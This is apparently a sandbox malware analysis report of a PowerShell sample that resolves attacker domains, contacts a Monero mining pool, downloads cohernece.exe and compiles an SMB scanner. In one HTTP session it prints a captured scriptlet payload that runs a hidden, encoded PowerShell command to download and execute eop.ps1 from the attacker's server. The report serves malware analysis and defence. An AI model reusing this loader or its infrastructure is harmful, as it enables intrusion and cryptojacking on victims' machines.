Sep 4, 2018 05:06:45.341588020 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.352560997 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.352638006 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.352678061 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.352715015 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.352745056 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.352756977 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.352785110 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.352807999 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.352812052 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.352830887 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.352888107 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.352971077 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.352996111 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.353018999 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.353041887 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.353065014 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.353070021 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.353094101 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.353117943 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.353141069 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.353154898 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.353163004 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.353185892 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 4, 2018 05:06:04.007205009 CEST | 56842 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:04.035728931 CEST | 53 | 56842 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:04.068552971 CEST | 53440 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:04.110846043 CEST | 53 | 53440 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:04.134479046 CEST | 59605 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:04.181596041 CEST | 53 | 59605 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:04.203902006 CEST | 50900 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:04.216890097 CEST | 53 | 50900 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:36.210169077 CEST | 51075 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:36.247931004 CEST | 53 | 51075 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:36.280410051 CEST | 61674 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:36.293931961 CEST | 53 | 61674 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:36.322196960 CEST | 59291 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:36.349576950 CEST | 53 | 59291 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:36.375962973 CEST | 63053 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:36.403438091 CEST | 53 | 63053 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:36.936928034 CEST | 60812 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:36.950007915 CEST | 53 | 60812 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:45.052798033 CEST | 58523 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:45.065839052 CEST | 53 | 58523 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:46.495673895 CEST | 65490 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:46.523380995 CEST | 53 | 65490 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:07:40.489527941 CEST | 60652 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:07:40.526570082 CEST | 53 | 60652 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:08:03.969499111 CEST | 57729 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:08:04.002902985 CEST | 53 | 57729 | 8.8.8.8 | 192.168.2.2

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Sep 4, 2018 05:06:04.043476105 CEST | 192.168.2.2 | 185.128.43.62 | 4d5a | |
Sep 4, 2018 05:06:04.057115078 CEST | 185.128.43.62 | 192.168.2.2 | 555a | | Echo Reply
Sep 4, 2018 05:06:04.111731052 CEST | 192.168.2.2 | 185.128.43.62 | 4d59 | | Echo
Sep 4, 2018 05:06:04.124952078 CEST | 185.128.43.62 | 192.168.2.2 | 5559 | | Echo Reply
Sep 4, 2018 05:06:04.182408094 CEST | 192.168.2.2 | 185.128.43.62 | 4d58 | | Echo
Sep 4, 2018 05:06:04.195564985 CEST | 185.128.43.62 | 192.168.2.2 | 5558 | | Echo Reply
Sep 4, 2018 05:06:04.217597961 CEST | 192.168.2.2 | 185.128.43.62 | 4d57 | | Echo
Sep 4, 2018 05:06:04.231029987 CEST | 185.128.43.62 | 192.168.2.2 | 5557 | | Echo Reply
Sep 4, 2018 05:06:36.249886036 CEST | 192.168.2.2 | 185.128.43.62 | 4d56 | | Echo
Sep 4, 2018 05:06:36.263454914 CEST | 185.128.43.62 | 192.168.2.2 | 5556 | | Echo Reply
Sep 4, 2018 05:06:36.295222044 CEST | 192.168.2.2 | 185.128.43.62 | 4d55 | | Echo
Sep 4, 2018 05:06:36.308455944 CEST | 185.128.43.62 | 192.168.2.2 | 5555 | | Echo Reply
Sep 4, 2018 05:06:36.350634098 CEST | 192.168.2.2 | 185.128.43.62 | 4d54 | | Echo
Sep 4, 2018 05:06:36.363841057 CEST | 185.128.43.62 | 192.168.2.2 | 5554 | | Echo Reply
Sep 4, 2018 05:06:36.404536009 CEST | 192.168.2.2 | 185.128.43.62 | 4d53 | | Echo
Sep 4, 2018 05:06:36.417956114 CEST | 185.128.43.62 | 192.168.2.2 | 5553 | | Echo Reply

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 4, 2018 05:06:04.007205009 CEST | 192.168.2.2 | 8.8.8.8 | 0xaa04 | Standard query (0) | update.7h4uk.com | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:04.068552971 CEST | 192.168.2.2 | 8.8.8.8 | 0x1b55 | Standard query (0) | update.7h4uk.com | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:04.134479046 CEST | 192.168.2.2 | 8.8.8.8 | 0xb21f | Standard query (0) | update.7h4uk.com | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:04.203902006 CEST | 192.168.2.2 | 8.8.8.8 | 0xcb4f | Standard query (0) | update.7h4uk.com | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:36.210169077 CEST | 192.168.2.2 | 8.8.8.8 | 0x89ac | Standard query (0) | update.7h4uk.com | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:36.280410051 CEST | 192.168.2.2 | 8.8.8.8 | 0xd08d | Standard query (0) | update.7h4uk.com | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:36.322196960 CEST | 192.168.2.2 | 8.8.8.8 | 0x4d12 | Standard query (0) | update.7h4uk.com | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:36.375962973 CEST | 192.168.2.2 | 8.8.8.8 | 0x2fa3 | Standard query (0) | update.7h4uk.com | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:36.936928034 CEST | 192.168.2.2 | 8.8.8.8 | 0xc76f | Standard query (0) | update.7h4uk.com | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:45.052798033 CEST | 192.168.2.2 | 8.8.8.8 | 0x47c | Standard query (0) | update.7h4uk.com | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:46.495673895 CEST | 192.168.2.2 | 8.8.8.8 | 0x781a | Standard query (0) | update.7h4uk.com | A (IP address) | IN (0x0001)
Sep 4, 2018 05:07:40.489527941 CEST | 192.168.2.2 | 8.8.8.8 | 0xf6c4 | Standard query (0) | f4keu.7h4uk.com | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:03.969499111 CEST | 192.168.2.2 | 8.8.8.8 | 0x6312 | Standard query (0) | xmr-eu1.nanopool.org | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 4, 2018 05:06:04.035728931 CEST | 8.8.8.8 | 192.168.2.2 | 0xaa04 | No error (0) | update.7h4uk.com | | 185.128.43.62 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:04.110846043 CEST | 8.8.8.8 | 192.168.2.2 | 0x1b55 | No error (0) | update.7h4uk.com | | 185.128.43.62 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:04.181596041 CEST | 8.8.8.8 | 192.168.2.2 | 0xb21f | No error (0) | update.7h4uk.com | | 185.128.43.62 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:04.216890097 CEST | 8.8.8.8 | 192.168.2.2 | 0xcb4f | No error (0) | update.7h4uk.com | | 185.128.43.62 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:36.247931004 CEST | 8.8.8.8 | 192.168.2.2 | 0x89ac | No error (0) | update.7h4uk.com | | 185.128.43.62 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:36.293931961 CEST | 8.8.8.8 | 192.168.2.2 | 0xd08d | No error (0) | update.7h4uk.com | | 185.128.43.62 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:36.349576950 CEST | 8.8.8.8 | 192.168.2.2 | 0x4d12 | No error (0) | update.7h4uk.com | | 185.128.43.62 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:36.403438091 CEST | 8.8.8.8 | 192.168.2.2 | 0x2fa3 | No error (0) | update.7h4uk.com | | 185.128.43.62 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:36.950007915 CEST | 8.8.8.8 | 192.168.2.2 | 0xc76f | No error (0) | update.7h4uk.com | | 185.128.43.62 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:45.065839052 CEST | 8.8.8.8 | 192.168.2.2 | 0x47c | No error (0) | update.7h4uk.com | | 185.128.43.62 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:06:46.523380995 CEST | 8.8.8.8 | 192.168.2.2 | 0x781a | No error (0) | update.7h4uk.com | | 185.128.43.62 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:07:40.526570082 CEST | 8.8.8.8 | 192.168.2.2 | 0xf6c4 | No error (0) | f4keu.7h4uk.com | | 185.128.43.58 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 51.15.58.224 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 198.251.88.21 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 217.182.169.148 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 51.15.65.182 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 51.15.78.68 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 51.255.34.118 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 213.32.29.143 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 5.196.23.240 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 5.196.13.29 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 151.80.144.253 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 92.222.180.119 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 164.132.109.110 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 51.15.54.102 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 79.137.82.5 | A (IP address) | IN (0x0001)
Sep 4, 2018 05:08:04.002902985 CEST | 8.8.8.8 | 192.168.2.2 | 0x6312 | No error (0) | xmr-eu1.nanopool.org | | 51.15.69.136 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

update.7h4uk.com:443 185.128.43.62

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.2 | 49161 | 185.128.43.62 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Sep 4, 2018 05:06:36.987550020 CEST | 2 | OUT |
GET /ver.txt HTTP/1.1
Host: update.7h4uk.com:443
Connection: Keep-Alive
Sep 4, 2018 05:06:37.001055956 CEST | 3 | IN |
HTTP/1.1 200 OK
Date: Tue, 04 Sep 2018 02:45:58 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Fri, 20 Jul 2018 13:16:46 GMT
ETag: "a02bb-4-5716e1b946601"
Accept-Ranges: bytes
Content-Length: 4
Content-type: application/octet-stream
Content-Disposition: attachment
Connection: close
Data Raw: 31 2e 38 0a
Data Ascii: 1.8

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.2 | 49162 | 185.128.43.62 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Sep 4, 2018 05:06:45.093209028 CEST | 4 | OUT |
GET /antivirus.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: update.7h4uk.com:443
Connection: Keep-Alive
Sep 4, 2018 05:06:45.106734991 CEST | 5 | IN |
HTTP/1.1 200 OK
Date: Tue, 04 Sep 2018 02:46:07 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Thu, 07 Jun 2018 05:41:10 GMT
ETag: "a0121-27b-56e06bb03c980"
Accept-Ranges: bytes
Content-Length: 635
Content-type: application/octet-stream
Content-Disposition: attachment
Connection: close
Data Raw: 3c 3f 58 4d 4c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 0d 0a 3c 73 63 72 69 70 74 6c 65 74 3e 0d 0a 3c 72 65 67 69 73 74 72 61 74 69 6f 6e 0d 0a 20 20 20 20 70 72 6f 67 69 64 3d 22 54 65 73 74 22 0d 0a 20 20 20 20 63 6c 61 73 73 69 64 3d 22 7b 31 30 30 30 31 31 31 31 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 46 45 45 44 41 43 44 43 7d 22 20 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 65 61 72 6e 20 66 72 6f 6d 20 43 61 73 65 79 20 53 6d 69 74 68 20 40 73 75 62 54 65 65 20 2d 2d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 5b 43 44 41 54 41 5b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 73 20 20 3d 20 22 63 6d 64 2e 65 78 65 20 2f 63 20 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 20 2d 6e 6f 70 20 2d 6e 6f 6e 69 20 2d 77 20 68 69 64 64 65 6e 20 2d 65 6e 63 20 53 51 42 46 41 46 67 41 49 41 41 6f 41 43 67 41 62 67 42 6c 41 48 63 41 4c 51 42 76 41 47 49 41 61 67 42 6c 41 47 4d 41 64 41 41 67 41 47 34 41 5a 51 42 30 41 43 34 41 64 77 42 6c 41 47 49 41 59 77 42 73 41 47 6b 41 5a 51 42 75 41 48 51 41 4b 51 41 75 41 47 51 41 62 77 42 33 41 47 34 41 62 41 42 76 41 47 45 41 5a 41 42 7a 41 48 51 41 63 67 42 70 41 47 34 41 5a 77 41 6f 41 43 63 41 61 41 42 30 41 48 51 41 63 41 41 36 41 43 38 41 4c 77 41 78 41 44 67 41 4e 51 41 75 41 44 45 41 4d 67 41 34 41 43 34 41 4e 41 41 7a 41 43 34 41 4e 67 41 79 41 43 38 41 5a 51 42 76 41 48 41 41 4c 67 42 77 41 48 4d 41 4d 51 41 6e 41 43 6b 41 4b 51 41 4b 41 41 3d 3d 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 2e 52 75 6e 28 70 73 2c 30 2c 74 72 75 65 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 5d 5d 3e 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 72 65 67 69 73 74 72 61 74 69 6f 6e 3e 0d 0a 3c 2f 73 63 72 69 70 74 6c 65 74 3e 0d 0a
Data Ascii:
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Test"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            ps  = "cmd.exe /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC4ANAAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA==";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);

        ]]>
</script>
</registration>
</scriptlet>

Session ID 2: 192.168.2.2:49163 -> 185.128.43.62:443, process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Sep 4, 2018 05:06:45.311439037 CEST, kBytes transferred: 5, OUT:
GET /logos.png HTTP/1.1
Host: update.7h4uk.com:443

Sep 4, 2018 05:06:45.325161934 CEST, kBytes transferred: 6, IN:
HTTP/1.1 200 OK
Date: Tue, 04 Sep 2018 02:46:07 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Tue, 29 May 2018 14:37:39 GMT
ETag: "a0145-114c1-56d592d0e92c0"
Accept-Ranges: bytes
Content-Length: 70849
Content-type: application/octet-stream
Content-Disposition: attachment
Connection: close

Session ID 3: 192.168.2.2:49164 -> 185.128.43.62:443, process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Sep 4, 2018 05:06:46.547508001 CEST, kBytes transferred: 80, OUT:
GET /antivirus.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: update.7h4uk.com:443
Connection: Keep-Alive

Sep 4, 2018 05:06:46.561300993 CEST, kBytes transferred: 81, IN:
HTTP/1.1 200 OK
Date: Tue, 04 Sep 2018 02:46:08 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Thu, 07 Jun 2018 05:41:10 GMT
ETag: "a0121-27b-56e06bb03c980"
Accept-Ranges: bytes
Content-Length: 635
Content-type: application/octet-stream
Content-Disposition: attachment
Connection: close
Data Ascii: ... Learn from Casey Smith @subTee -->

Session ID 4: 192.168.2.2:49165 -> 185.128.43.62:80, process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Sep 4, 2018 05:06:48.810359001 CEST, kBytes transferred: 82, OUT:
GET /eop.ps1 HTTP/1.1
Host: 185.128.43.62
Connection: Keep-Alive

Sep 4, 2018 05:06:48.824304104 CEST, kBytes transferred: 83, IN:
HTTP/1.1 200 OK
Date: Tue, 04 Sep 2018 02:46:10 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 11 Jul 2018 08:12:19 GMT
ETag: "a0138-3f1b-570b4ce2c7ec0"
Accept-Ranges: bytes
Content-Length: 16155
Content-type: application/octet-stream
Content-Disposition: attachment
Connection: close

Session ID 5: 192.168.2.2:49166 -> 185.128.43.62:443, process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Sep 4, 2018 05:06:50.427557945 CEST, kBytes transferred: 100, OUT:
GET /cohernece.txt HTTP/1.1
Host: update.7h4uk.com:443

Sep 4, 2018 05:06:50.441154003 CEST, kBytes transferred: 101, IN:
HTTP/1.1 200 OK
Date: Tue, 04 Sep 2018 02:46:12 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Tue, 29 May 2018 09:50:14 GMT
ETag: "a013a-6089a2-56d55292cc180"
Accept-Ranges: bytes
Content-Length: 6326690
Content-type: application/octet-stream
Content-Disposition: attachment
Connection: close

Session ID 6: 192.168.2.2:49167 -> 185.128.43.62:80, process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Sep 4, 2018 05:07:17.495357990 CEST, kBytes transferred: 7420, OUT:
GET /eop.ps1 HTTP/1.1
Host: 185.128.43.62
Connection: Keep-Alive

Sep 4, 2018 05:07:17.509254932 CEST, kBytes transferred: 7421, IN:
HTTP/1.1 200 OK
Date: Tue, 04 Sep 2018 02:46:39 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 11 Jul 2018 08:12:19 GMT
ETag: "a0138-3f1b-570b4ce2c7ec0"
Accept-Ranges: bytes
Content-Length: 16155
Content-type: application/octet-stream
Content-Disposition: attachment
Connection: close

Session ID 7: 192.168.2.2:49168 -> 185.128.43.58:80, process C:\Users\user\AppData\Local\Temp\cohernece.exe

kBytes Timestamp transferred Direction Data

Code Manipulations

Statistics

Behavior

• powershell.exe • netsh.exe • netsh.exe • netsh.exe • netsh.exe • netsh.exe • netsh.exe • schtasks.exe • schtasks.exe • schtasks.exe • taskeng.exe • powercfg.exe • powercfg.exe • regsvr32.exe • powercfg.exe • regsvr32.exe • NETSTAT.EXE • csc.exe • NETSTAT.EXE • cmd.exe • powershell.exe • cmd.exe • powershell.exe • reg.exe • reg.exe • reg.exe • cohernece.exe • findstr.exe • reg.exe • cohernece.exe • findstr.exe • powershell.exe • NETSTAT.EXE • reg.exe


System Behavior

Analysis Process: powershell.exe PID: 3268 Parent PID: 3064

General

Start time: 05:05:41
Start date: 04/09/2018
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\antitrojan.ps1'
Imagebase: 0x21e10000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches: Rule: PowerShell_Mal_HackTool_Gen, Description: Detects PowerShell hack tool samples - generic PE loader, Source: 00000001.00000003.1684190923.02432000.00000004.sdmp, Author: Florian Roth
Reputation: high

File Activities

File Created

C:\Users\user\AppData\Local\Temp\06trmcfr.tmp
  Access: read attributes | synchronize | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 17E072F; Symbol: CreateFileW
C:\Users\user\AppData\Local\Temp\06trmcfr.0.cs
  Access: read attributes | synchronize | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 17E072F; Symbol: CreateFileW
C:\Users\user\AppData\Local\Temp\06trmcfr.dll
  Access: read attributes | synchronize | generic read | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 17E072F; Symbol: CreateFileW
C:\Users\user\AppData\Local\Temp\06trmcfr.cmdline
  Access: read attributes | synchronize | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 17E072F; Symbol: CreateFileW
C:\Users\user\AppData\Local\Temp\06trmcfr.out
  Access: read attributes | synchronize | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 17E072F; Symbol: CreateFileW
C:\Users\user\AppData\Local\Temp\06trmcfr.err
  Access: read attributes | synchronize | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 17E072F; Symbol: CreateFileW
C:\Users\user\AppData\Local\Temp\java-log-9527.log
  Access: read attributes | synchronize | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 17E072F; Symbol: CreateFileW
C:\Users\user\AppData\Local\Temp\cohernece.exe
  Access: read attributes | synchronize | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 17E072F; Symbol: CreateFileW

File Deleted

File Path | Completion | Count | Address | Symbol
C:\Users\user\AppData\Local\Temp\06trmcfr.cmdline | success or wait | 1 | 17E01D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\06trmcfr.tmp | success or wait | 1 | 17E01D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\06trmcfr.dll | success or wait | 1 | 17E01D2 | DeleteFileW
C:\Users\user\AppData\Local\Temp\06trmcfr.0.cs | success or wait | 1 | 17E01D2 | DeleteFileW

Source Old File Path New File Path Completion Count Address Symbol

File Written

File Path | Offset | Length | Ascii | Completion | Count | Address | Symbol
C:\Users\user\AppData\Local\Temp\06trmcfr.0.cs | unknown | 4096 | ...using System;..using System.Collections.Generic;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Net.Sockets;..using System.Text;....namespace PingCastle.Scanners..{...public class m17sc...{....static public bool Scan(stri | success or wait | 1 | 17E08E7 | WriteFile
C:\Users\user\AppData\Local\Temp\06trmcfr.0.cs | unknown | 1640 | = new byte[] {...... 0x00,0x00,...... 0xff,0x53,0x4d,0x42,...... 0x75,...... 0x00,...... 0x00,0x00,...... 0x18,...... 0x01,0x28,...... 0x00,0x00,...... 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,...... 0x00,0x00,...... data[28],data[29],data[30],da | success or wait | 1 | 17E08E7 | WriteFile
C:\Users\user\AppData\Local\Temp\06trmcfr.cmdline | unknown | 327 | .../t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:"C:\Users\user\AppData\Local\Temp\06trmcfr.dll" /D:DEBUG /debug+ /optimize- | success or wait | 1 | 17E08E7 | WriteFile
C:\Users\user\AppData\Local\Temp\06trmcfr.out | unknown | 422 | ...C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /o | success or wait | 1 | 17E08E7 | WriteFile
